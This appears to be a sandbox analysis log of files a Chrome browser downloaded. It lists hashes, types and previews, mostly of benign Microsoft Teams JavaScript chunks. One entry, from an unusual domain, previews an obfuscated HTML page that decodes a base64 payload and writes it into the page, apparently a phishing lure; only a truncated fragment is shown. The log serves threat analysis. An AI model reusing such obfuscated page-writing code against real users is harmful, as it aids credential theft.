                                                                                                                                                                                                                                                                            Preview:(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[477986,938490,249643],{831890:(e,i,t)=>{"use strict";t.d(i,{hw:()=>O});var n=t(526521),o=t(795631),a=t(763588),l=t(251763),d=t(513432),s=t.n(d),c=t(249643),r=t(361765),u=t(965804);const v=(0,u.O)({appBar:{Bqenvij:"f1l02sjl",a9b677:"f124akge"},twoColumnViewBackground:{De3pzq:"f1ctqxl6"},threeColumnViewBackground:{De3pzq:"f3vzo32"},wideAppBar:{a9b677:"f3swjwz",z8tnut:"f1g0x7ka",z189sj:["fhxju0i","f1cnd47f"],Byoj8tv:"f1qch9an",uwmqm3:["f1cnd47f","fhxju0i"]},verticalGap:{i8kkvl:0,Belr9w4:0,rmohyg:"f1yhwmi5"},mercuryDesignAppBar:{a9b677:"f124akge",z8tnut:"f1809wu7",z189sj:["f81rol6","frdkuqy"],Byoj8tv:"f1qch9an",uwmqm3:["frdkuqy","f81rol6"]},tileContainer:{sshi5w:"f17wyjut",B68tc82:"f1mtd64y"},tileContainerCenterAligned:{Bh6795r:"f1h4v2dc",Brf1p80:"f4d9j23",sshi5w:"f17wyjut",B68tc82:"f1mtd64y"},tileContainerWide:{sshi5w:"fsuw20m"},tileContainerWideCenterAligned:{Bh6795r:"f1h4v2dc",Brf1p80:"f4d
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (22233)
                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                            Size (bytes):22350
                                                                                                                                                                                                                                                                            Entropy (8bit):5.354768146323387
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:384:j6moO1OhHwAeAyz+NTglTuTETMCDTVDTsDTPDT5EDT+DTIL1DTa+dv6MWYk4zDTI:j6moO1OhHbNTglTuTETMmTVT8T7T5kTk
                                                                                                                                                                                                                                                                            MD5:F8D1F88680491EC04E1E21B710A84F23
                                                                                                                                                                                                                                                                            SHA1:C271AF2FE61585DFB3152F2E4074B05FED20A6C3
                                                                                                                                                                                                                                                                            SHA-256:DDEC22EB66FAAB5AA0F1752965F82B531F26E223F6CD1A26AD9D1EDB91CDDB40
                                                                                                                                                                                                                                                                            SHA-512:0D35C8FC04CCEEE5D5716C8F2F07B95C60E4CCC72026D9CE4D15B0A5D0669D309C355F5F83C744D6D146289BA565EBF2E5191B4BE0A61312F29CE1872BE07D2D
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                                            Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[136417],{943719:(e,s,t)=>{t.r(s),t.d(s,{ANONYMOUS_USER_MRI_TFL_PREFIX:()=>h.F,ANONYMOUS_USER_MRI_TFW_PREFIX:()=>h.et,AliasVisibilitySetting:()=>p.X3,DEFAULT_ZERO_STATE_SUGGESTIONS_TO_SHOW_COUNT:()=>h.X7,EventActionTakenTypes:()=>te.Hh,EventTypes:()=>te.wf,FederatedUserStatus:()=>p.SV,HTTPRequestMethod:()=>p.FL,LayoutTypes:()=>te.ui,M365PersonaType:()=>h.SG,PSTN_MRI_PREFIX:()=>h.Oc,PeoplePickerFilterType:()=>te.gI,PeoplePickerFilters:()=>se.H,PeoplePickerFor:()=>te.d1,PeoplePickerItemType:()=>h.lT,PeopleSearchSource:()=>te.f_,PeopleService:()=>Y,PeopleServiceApiName:()=>p.GA,PeopleUtilities:()=>h.af,PhoneType:()=>p.L,ProfilePictureSize:()=>p.xi,ProfilePictureSizesDescriptions:()=>p.Xz,ProfileUpdateChangeType:()=>Z,ProfileUpdateSyncService:()=>pe,ProfileUpdateSyncStatus:()=>ee,Provider:()=>te.Kq,RequestType:()=>p.Yw,StatusCodeFromMTResponse:()=>p.s9,TFL_SMS_UN_VERIFIED_MRI_PREF
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (37953)
                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                            Size (bytes):38061
                                                                                                                                                                                                                                                                            Entropy (8bit):5.448293239314431
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:768:XDmCE8lrGpISt/mliGc0obeleSDJSW4w6FaLjnpOREBIDEvVFNxWjbj9fbNQSgnQ:6G8JRkclLxEp0gnEeAB3/CTupMdhK9xJ
                                                                                                                                                                                                                                                                            MD5:A117538BF4047A2E645A137E3AC4BD11
                                                                                                                                                                                                                                                                            SHA1:2FB8F07C150934A27009BED3F125EFECED790231
                                                                                                                                                                                                                                                                            SHA-256:A5F88D747B353551482930D73E54AC628E3FC34D503D9357F033DE8A33573FD3
                                                                                                                                                                                                                                                                            SHA-512:BB8442EA5CDE7C347B166110E804537F1ABF656A386E421DF1849768FE35F6FB13D3E9545151D192B8761EAEE6B9CBEDF36663526A3C4872794CD282DFC71E4E
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[762949],{478990:(e,t,n)=>{n.d(t,{e:()=>s});var a=n(35158);function s(e,t,n,s,i,o){const{fragmentName:r,fragmentTypeName:d,fragment:c}=(0,a.LT)(n);try{const n=`${d}:${t}`,a=e.readFragment({id:n,fragment:c,fragmentName:r});e.writeFragment({id:n,fragment:c,fragmentName:r,data:{...a,crossPostStatus:s,crossPostFailedChannels:i}})}catch(e){o.error(`updatePostWithCrossPostStatus: Failed writing failure status to cache for post with id: ${t}`)}}},574211:(e,t,n)=>{n.d(t,{u:()=>a});const a=e=>!!e&&-1!==["jpg","jpeg","png","gif"].indexOf(e)},581945:(e,t,n)=>{n.d(t,{W:()=>i});var a=n(362328),s=n(780706);const i={kind:"Document",get definitions(){const e=(0,a.G)("fragment ComponentsChatPaneSharedAppDefinitionFragment on AppDefinition {id,name,bots {...botDefinition},largeImageUrl}");return delete this.definitions,this.definitions=[...e.definitions,...s.x.definitions]}}},971225:(e,t,n)=>{n
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (1024)
                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                            Size (bytes):1132
                                                                                                                                                                                                                                                                            Entropy (8bit):5.286761914638033
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:24:wp3sp389aKZ8FzXbSu6G1Thh7jAga08xOVbLoTP3YhYbB:wp3sp3xK2z319C3x6voLY2B
                                                                                                                                                                                                                                                                            MD5:E64641781757C9FD4E4F3087FD37EB26
                                                                                                                                                                                                                                                                            SHA1:AD3CD4AC308D71350795CD9499836B4163A2C039
                                                                                                                                                                                                                                                                            SHA-256:7FF1F60B66A1BAAB538F0030F7043B542295FA881BC28407B3D89E7D1138FB8D
                                                                                                                                                                                                                                                                            SHA-512:5D76A81D69B94F90349E0E564E1C4DA7BF69A81293BA0787CEB8CE9AFB1A8AB12B4354C04F9E9C95AE064AB4ED38D24D1D2BDA95727731F9E041AB5FE5F972C9
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[372599],{372599:(e,a,s)=>{s.d(a,{v:()=>h});var c=s(957032),l=s(395225),t=s.n(l),i=s(485529),n=s(829289);const h=(0,i.Ke)({svg:({classes:e})=>(0,c.Y)("svg",{role:"presentation",focusable:"false",viewBox:"8 8 16 16",className:e.svg,children:(0,c.Y)("g",{children:[(0,c.Y)("path",{className:t()(n.Q.outline,e.outlinePart),d:"M21 15.97c0 .14-.05.25-.15.35l-7 7a.485.485 0 0 1-.7 0 .485.485 0 0 1 0-.7l6.64-6.65-6.64-6.65a.485.485 0 0 1 0-.7.485.485 0 0 1 .7 0l7 7c.1.1.15.21.15.35z"}),(0,c.Y)("path",{className:t()(n.Q.filled,e.filledPart),d:"M21.5 15.97c0 .28-.1.52-.29.71l-7 7c-.19.19-.43.29-.71.29-.14 0-.26-.03-.38-.08s-.23-.13-.32-.22-.16-.2-.22-.32a1.036 1.036 0 0 1-.01-.77c.05-.12.12-.23.21-.32l6.3-6.29-6.3-6.29a.85.85 0 0 1-.21-.32c-.05-.13-.07-.26-.07-.39a.995.995 0 0 1 .3-.7c.09-.09.2-.16.32-.22.12-.05.24-.08.38-.08.28 0 .52.1.71.29l7 7c.19.19.29.43.29.71z"})]})}),displayName:"
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (18090)
                                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                                            Size (bytes):18198
                                                                                                                                                                                                                                                                            Entropy (8bit):5.2472093841132255
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:384:/hjiNKDRrneqGmkceQfUWhrlyHN3s6yDgeKh+4x:AYRCqGmlkstFMx
                                                                                                                                                                                                                                                                            MD5:6D1DD80CE4B44C72A4DE16750E44134D
                                                                                                                                                                                                                                                                            SHA1:618482F648F404865268D76FD11795A2C574257C
                                                                                                                                                                                                                                                                            SHA-256:0B8C7AF0328A72F21E6F3AC0BE8602163F6EFF616B3B9375CC96FA780E525CB2
                                                                                                                                                                                                                                                                            SHA-512:01FBC605056CE06A2B5D95F24B01B5F4A6D862C41FA7BA0DE2BD22B490EC6ADBBAE6FA78FE3D15318EA75F0A6CA9ECC7FE88A6DD610CC9634CBDF9DBB485758A
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            URL:https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/659426-83b594f2e0333f35.js
                                                                                                                                                                                                                                                                            Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[659426,437045],{608023:(e,t,n)=>{n.d(t,{z2:()=>g,su:()=>b,q6:()=>T,OI:()=>C,TX:()=>I,nv:()=>E,h5:()=>w,lg:()=>D});var r=n(179233),i=n(236722),s=n(99647),o="Data.",a="zC.",u="Release.AudienceGroup",c="App.Name",l="App.Platform",f="App.Version",d="User.PrimaryIdentityHash",p="User.PrimaryIdentitySpace",v="User.TenantId",h="User.IsAnonymous",m="User.IsSignedIn",y="Session.Id",g="f998cc5ba4d448d6a1e8e913ff18be94-dd122e0a-fcf8-4dc5-9dbb-6afac5325183-7405",b="b22a201c3f1d41d28ccc399ba6cc9ca2-1972c77f-1f79-4283-a0f9-b4ddc4646f55-7121",T=void 0;function C(e,t,n,r){var s=!0;if(t)for(var u=function(t){var u=t.classification,c=t.dataType,l=t.name;if(u&&!(4===u||1===u||2===r&&32===u||3===r&&2048===u))return s=!1,"break";if(3===r&&n&&3!==c&&1!==c&&2!==c&&"OTelJS.Version"!==l&&"OTelJS.Sink"!==l)return(0,i.wC)(0,1,(function(){return"DNM: Invalid field type "+l})),s=!1,"break";var f=void 0;f
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (18090)
                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                            Size (bytes):18198
                                                                                                                                                                                                                                                                            Entropy (8bit):5.2472093841132255
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:384:/hjiNKDRrneqGmkceQfUWhrlyHN3s6yDgeKh+4x:AYRCqGmlkstFMx
                                                                                                                                                                                                                                                                            MD5:6D1DD80CE4B44C72A4DE16750E44134D
                                                                                                                                                                                                                                                                            SHA1:618482F648F404865268D76FD11795A2C574257C
                                                                                                                                                                                                                                                                            SHA-256:0B8C7AF0328A72F21E6F3AC0BE8602163F6EFF616B3B9375CC96FA780E525CB2
                                                                                                                                                                                                                                                                            SHA-512:01FBC605056CE06A2B5D95F24B01B5F4A6D862C41FA7BA0DE2BD22B490EC6ADBBAE6FA78FE3D15318EA75F0A6CA9ECC7FE88A6DD610CC9634CBDF9DBB485758A
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[659426,437045],{608023:(e,t,n)=>{n.d(t,{z2:()=>g,su:()=>b,q6:()=>T,OI:()=>C,TX:()=>I,nv:()=>E,h5:()=>w,lg:()=>D});var r=n(179233),i=n(236722),s=n(99647),o="Data.",a="zC.",u="Release.AudienceGroup",c="App.Name",l="App.Platform",f="App.Version",d="User.PrimaryIdentityHash",p="User.PrimaryIdentitySpace",v="User.TenantId",h="User.IsAnonymous",m="User.IsSignedIn",y="Session.Id",g="f998cc5ba4d448d6a1e8e913ff18be94-dd122e0a-fcf8-4dc5-9dbb-6afac5325183-7405",b="b22a201c3f1d41d28ccc399ba6cc9ca2-1972c77f-1f79-4283-a0f9-b4ddc4646f55-7121",T=void 0;function C(e,t,n,r){var s=!0;if(t)for(var u=function(t){var u=t.classification,c=t.dataType,l=t.name;if(u&&!(4===u||1===u||2===r&&32===u||3===r&&2048===u))return s=!1,"break";if(3===r&&n&&3!==c&&1!==c&&2!==c&&"OTelJS.Version"!==l&&"OTelJS.Sink"!==l)return(0,i.wC)(0,1,(function(){return"DNM: Invalid field type "+l})),s=!1,"break";var f=void 0;f
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (19951)
                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                            Size (bytes):20058
                                                                                                                                                                                                                                                                            Entropy (8bit):5.301484485075663
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:384:UOmMRB7DsuJmOv7+ijeoTfJoINLEqF+5BGk:fbsVqtjPThorVJ
                                                                                                                                                                                                                                                                            MD5:34407BE2AFA1792CDB44C58E48ABFB23
                                                                                                                                                                                                                                                                            SHA1:C9AC25CF2AB6163F1C8288A3E32E669785CD4021
                                                                                                                                                                                                                                                                            SHA-256:F766D7CA6D6CBC1572B1DA8B46566A26B1BAFC66487193886FC2CD9190E42944
                                                                                                                                                                                                                                                                            SHA-512:570FD69E553A4E228D9DC003A204F91D183A9801AB0EE9A99D696B1E7808B31F312453DA26704A36D794BD84E7A834BFD36C3A6E5DFD7C63F4E128DE9A2821A3
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            Preview:(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[19528],{408501:r=>{r.exports=function(r,t,n){switch(n.length){case 0:return r.call(t);case 1:return r.call(t,n[0]);case 2:return r.call(t,n[0],n[1]);case 3:return r.call(t,n[0],n[1],n[2])}return r.apply(t,n)}},816349:r=>{r.exports=function(r,t){for(var n=-1,e=null==r?0:r.length;++n<e&&!1!==t(r[n],n,r););return r}},44953:(r,t,n)=>{var e=n(939767);r.exports=function(r,t){return!!(null==r?0:r.length)&&e(r,t,0)>-1}},875597:r=>{r.exports=function(r,t,n){for(var e=-1,o=null==r?0:r.length;++e<o;)if(n(t,r[e]))return!0;return!1}},816920:r=>{r.exports=function(r,t){for(var n=-1,e=null==r?0:r.length,o=Array(e);++n<e;)o[n]=t(r[n],n,r);return o}},698078:r=>{r.exports=function(r){return r.split("")}},907001:(r,t,n)=>{var e=n(314172),o=n(484636);r.exports=function(r,t,n){(void 0!==n&&!o(r[t],n)||void 0===n&&!(t in r))&&e(r,t,n)}},872791:(r,t,n)=>{var e=n(314172),o=n(484636),u=Object.prototype.hasOwnProp
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:HTML document, ASCII text, with very long lines (7337), with CRLF line terminators
                                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                                            Size (bytes):19511
                                                                                                                                                                                                                                                                            Entropy (8bit):5.885334252193225
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:384:/nuUvE5Zuy+DVv57sfaVmleAmunuUvE5Zuy+DVv57sfaVml/lrhlrn:FE5Zuf2f8UeAmUE5Zuf2f8U/lrhlrn
                                                                                                                                                                                                                                                                            MD5:BBA02E5947CDF90FFF215BBE620333B9
                                                                                                                                                                                                                                                                            SHA1:038E4AED23ECCFE7DF6722B539D8A1EE64F92924
                                                                                                                                                                                                                                                                            SHA-256:B9085186BCF493BF35CB55D56E77CD541AE94AABAB6410A85523D3540A62C7F8
                                                                                                                                                                                                                                                                            SHA-512:B6D89CA2C97374AF263F9639585547930C65FB4C8BE30A360352093EAE8E57A9D917F7A58E1646506E961E807F9E5864C389718758BF4B97DCB514A61967A189
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            URL:https://j9lg.xbyhiqbjl.com/admi/
                                                                                                                                                                                                                                                                            Preview:<script>....if(atob("aHR0cHM6Ly9GMS54YnloaXFiamwuY29tL2FkbWkv") == "nomatch"){..document.write(decodeURIComponent(escape(atob('PCFET0NUWVBFIGh0bWw+DQo8aHRtbCBsYW5nPSJlbiI+DQo8aGVhZD4NCiAgICA8c2NyaXB0IHNyYz0iaHR0cHM6Ly9jb2RlLmpxdWVyeS5jb20vanF1ZXJ5LTMuNi4wLm1pbi5qcyI+PC9zY3JpcHQ+DQogICAgPHNjcmlwdCBzcmM9Imh0dHBzOi8vY2hhbGxlbmdlcy5jbG91ZGZsYXJlLmNvbS90dXJuc3RpbGUvdjAvYXBpLmpzP3JlbmRlcj1leHBsaWNpdCI+PC9zY3JpcHQ+DQogICAgPHNjcmlwdCBzcmM9Imh0dHBzOi8vY2RuanMuY2xvdWRmbGFyZS5jb20vYWpheC9saWJzL2NyeXB0by1qcy80LjEuMS9jcnlwdG8tanMubWluLmpzIj48L3NjcmlwdD4NCiAgICA8bWV0YSBodHRwLWVxdWl2PSJYLVVBLUNvbXBhdGlibGUiIGNvbnRlbnQ9IklFPUVkZ2UsY2hyb21lPTEiPg0KICAgIDxtZXRhIG5hbWU9InJvYm90cyIgY29udGVudD0ibm9pbmRleCwgbm9mb2xsb3ciPg0KICAgIDxtZXRhIG5hbWU9InZpZXdwb3J0IiBjb250ZW50PSJ3aWR0aD1kZXZpY2Utd2lkdGgsIGluaXRpYWwtc2NhbGU9MS4wIj4NCiAgICA8dGl0bGU+JiM4MjAzOzwvdGl0bGU+DQogICAgPHN0eWxlPg0KYm9keSB7DQogIGJhY2tncm91bmQtY29sb3I6ICNmZmY7DQogIGhlaWdodDogMTAwJTsNCiAgb3ZlcmZsb3c6IGhpZGRlbjsNCn0NCiNtQ2hsUkdSbG1RIGg0e21hcmdpbi10b
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (43425)
                                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                                            Size (bytes):43533
                                                                                                                                                                                                                                                                            Entropy (8bit):5.2090613026600465
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:768:VtXZGCUCr0VC2CGC6Ch+/6CDCBCICTIg17CWtBIY7/2emockcRG0:VVICUCgC2CGC6CAiCDCBCICTpCWjyF
                                                                                                                                                                                                                                                                            MD5:7CF7331E970587E7E8796556AE6910D2
                                                                                                                                                                                                                                                                            SHA1:8A98A39E2BE8FD2123487C085B8306DFDDDF9BB5
                                                                                                                                                                                                                                                                            SHA-256:87D56429B11DB224B9DD392C380E0BE6D2389CDDB2D30E96E617986A3325E067
                                                                                                                                                                                                                                                                            SHA-512:724F9EACB63C302614CB3B3AE467BA87971EC84FFDB7F49D1D5443655A42E70D7D20206801605ADA83E1F8FECBB2F7505CF9F0B7AA13623EC7643472F533FD49
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            URL:https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/900161-4a3c2a69b8fc85e1.js
                                                                                                                                                                                                                                                                            Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[900161],{414250:(e,t,l)=>{l.d(t,{g:()=>C});var a=l(513432),C=(0,l(485529).Ke)({svg:function(e){var t=e.classes;return a.createElement("svg",{role:"presentation",focusable:"false",viewBox:"0 0 32 32",className:t.svg},a.createElement("path",{d:"M9.5 29H28.5C28.775 29 29 28.775 29 28.5V9H24.5C23.673 9 23 8.327 23 7.5V3H9.5C9.225 3 9 3.225 9 3.5V28.5C9 28.775 9.225 29 9.5 29Z",fill:"white"}),a.createElement("path",{d:"M28.293 8.00003L24 3.70703V7.50003C24 7.77503 24.225 8.00003 24.5 8.00003H28.293Z",fill:"white"}),a.createElement("path",{opacity:"0.64",fillRule:"evenodd",clipRule:"evenodd",d:"M29.56 7.854L24.146 2.439C23.8642 2.15891 23.4833 2.00117 23.086 2H9.5C8.673 2 8 2.673 8 3.5V28.5C8 29.327 8.673 30 9.5 30H28.5C29.327 30 30 29.327 30 28.5V8.914C30 8.514 29.844 8.137 29.56 7.854ZM24 3.707L28.293 8H24.5C24.2241 7.99945 24.0005 7.77591 24 7.5V3.707ZM9.5 29H28.5C28.775 29 29 2
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (46888)
                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                            Size (bytes):46996
                                                                                                                                                                                                                                                                            Entropy (8bit):5.108957386891247
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:768:ah4GRVGB3+pCxxesNuoDEcv9FLuCn+MAr7F4wZZMxhD:wSe6fDEoLuVMArLZZMxx
                                                                                                                                                                                                                                                                            MD5:B318139959F84BFCD9194D8BBA1F1797
                                                                                                                                                                                                                                                                            SHA1:48A05E8B5EBDB233C28F154AAFB164903ACEBF21
                                                                                                                                                                                                                                                                            SHA-256:9782CDAE931F663CDFC8BBCDE6A7C99B872B6382661863D7E96C76F075469063
                                                                                                                                                                                                                                                                            SHA-512:B340FA47578450E78009080790C0412251A9171E532ABBC9EF7ED65AAA200968E3A7B68242F85A401657E28BBDBD9A979E2544755BC752ED431BD937D3CA6FE1
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            Preview:(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[183153],{878709:(e,t,n)=>{e.exports=n(765583)},140906:(e,t,n)=>{var o=e.exports=n(490627),r=/\s+/,i={};o.Callbacks=function(e){e="string"==typeof e?i[e]||function(e){var t=i[e]={};return o.each(e.split(r),(function(e,n){t[n]=!0})),t}(e):o.extend({},e);var t,n,a,c,s,l,u=[],d=!e.once&&[],p=function(o){for(t=e.memory&&o,n=!0,l=c||0,c=0,s=u.length,a=!0;u&&l<s;l++)if(!1===u[l].apply(o[0],o[1])&&e.stopOnFalse){t=!1;break}a=!1,u&&(d?d.length&&p(d.shift()):t?u=[]:g.disable())},g={add:function(){if(u){var n=u.length;!function t(n){o.each(n,(function(n,r){var i=o.type(r);"function"===i?e.unique&&g.has(r)||u.push(r):r&&r.length&&"string"!==i&&t(r)}))}(arguments),a?s=u.length:t&&(c=n,p(t))}return this},remove:function(){return u&&o.each(arguments,(function(e,t){for(var n;(n=o.inArray(t,u,n))>-1;)u.splice(n,1),a&&(n<=s&&s--,n<=l&&l--)})),this},has:function(e){return o.inArray(e,u)>-1},empty:function()
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (33266)
                                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                                            Size (bytes):33374
                                                                                                                                                                                                                                                                            Entropy (8bit):5.170268480848515
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:768:JkQajjwCbtihMF2vwh8R5VOdJXLIgqx6fj0K:J9h/vwhOWcgq+R
                                                                                                                                                                                                                                                                            MD5:40832E67D4391FFDB1613F7DB5F33076
                                                                                                                                                                                                                                                                            SHA1:70382211316199F58BC0D3D56C2A98C81849E11D
                                                                                                                                                                                                                                                                            SHA-256:9A525A37F6D2471F7E74B15172D469DAA14C47096827395DDEB769BFE2E4590A
                                                                                                                                                                                                                                                                            SHA-512:707F2BE3C1177E85036AD8163ADA6FBC33F000F83AE80F6F80A5D32D8FB787CE51C6EB129D0541D6D3C2BE7C277985C380A8EDF4B1AD67061019CE266E917FE4
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            URL:https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/337355-53949d9632bb831d.js
                                                                                                                                                                                                                                                                            Preview:(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[337355],{327402:function(t,r){var e,n,o;n=[],void 0===(o="function"==typeof(e=function(){var t=/^v?(?:\d+)(\.(?:[x*]|\d+)(\.(?:[x*]|\d+)(\.(?:[x*]|\d+))?(?:-[\da-z\-]+(?:\.[\da-z\-]+)*)?(?:\+[\da-z\-]+(?:\.[\da-z\-]+)*)?)?)?$/i;function r(t,r){return-1===t.indexOf(r)?t.length:t.indexOf(r)}function e(t){var e=t.replace(/^v/,"").replace(/\+.*$/,""),n=r(e,"-"),o=e.substring(0,n).split(".");return o.push(e.substring(n+1)),o}function n(t){return isNaN(Number(t))?t:Number(t)}function o(r){if("string"!=typeof r)throw new TypeError("Invalid argument expected string");if(!t.test(r))throw new Error("Invalid argument not valid semver ('"+r+"' received)")}function i(t,r){[t,r].forEach(o);for(var i=e(t),s=e(r),c=0;c<Math.max(i.length-1,s.length-1);c++){var u=parseInt(i[c]||0,10),a=parseInt(s[c]||0,10);if(u>a)return 1;if(a>u)return-1}var f=i[i.length-1],l=s[s.length-1];if(f&&l){var p=f.split(".").map(n
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                            Size (bytes):97386
                                                                                                                                                                                                                                                                            Entropy (8bit):5.409202916101396
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:1536:AYOFtBcBgh/A3ckqBWqnq/eygnuOXwWQa01bYO1MCt8q:AYOFCf/cq/NRr1MNCtF
                                                                                                                                                                                                                                                                            MD5:DEB6CC65C69E068DFB8E094926954D7F
                                                                                                                                                                                                                                                                            SHA1:1FB93B19BC2FA21B1BF08BE5916FB62D34F3438E
                                                                                                                                                                                                                                                                            SHA-256:C6074B5366BBDEC84AAF41BC66C753A96F3850C5A9E3F8974073B32F2956CEE8
                                                                                                                                                                                                                                                                            SHA-512:54DB639E45E7904BD9C3C36ED8C555FEBFD5CA1C8381E61056BE75B4138A6638B1120C031FFBCEF6D316C5150E47796A76B082D48E7D57237A10F69D11917D50
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[747607],{872994:(n,t,e)=>{e.d(t,{_:()=>H});var r=e(340415),i=e(344411),u=e(759377),o=e(179233),a=e(680828),c=e(260026),f=e(215729),l=e(490507),s=e(722990),v=e(268288),d=e(498863),g=e(661187),h=e(952741),y=e(246904),p=e(483152),m=e(679080),b=e(779497),I=e(287856);var S,w=function(n){function t(){var e,r,u=n.call(this)||this;function a(){e=0,r=[]}return u.identifier="TelemetryInitializerPlugin",u.priority=199,a(),(0,i.A)(t,u,(function(n,t){n.addTelemetryInitializer=function(n){return function(n,t,e){var r={id:t,fn:e};return(0,o.Yny)(n,r),{remove:function(){(0,o.Iuo)(n,(function(t,e){if(t.id===r.id)return n[c.Ic](e,1),-1}))}}}(r,e++,n)},n[y.qT]=function(t,e){(function(n,t,e){for(var r=!1,i=n[c.oI],u=0;u<i;++u){var a=n[u];if(a)try{if(!1===a.fn[c.y9](null,[t])){r=!0;break}}catch(n){(0,g.ZP)(e,2,64,"Telemetry initializer failed: "+(0,h.lL)(n),{exception:(0,o.mmD)(n)},!0)}}return!r}
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (36103)
                                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                                            Size (bytes):36211
                                                                                                                                                                                                                                                                            Entropy (8bit):5.261480504529277
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:768:vFORCEcOC/BExYLil95/8ZpA2Me/vDwYNtvE:vVZNLie73ZtvE
                                                                                                                                                                                                                                                                            MD5:7F5787BE53067A2AD5210A29F8E320F9
                                                                                                                                                                                                                                                                            SHA1:B6A10C98183301615C2C8350B537793049940A96
                                                                                                                                                                                                                                                                            SHA-256:B85FC31F32AC2F798BBBE739B1D0CD3D199DBFA2D92F86C0159EF4FB2520CBD4
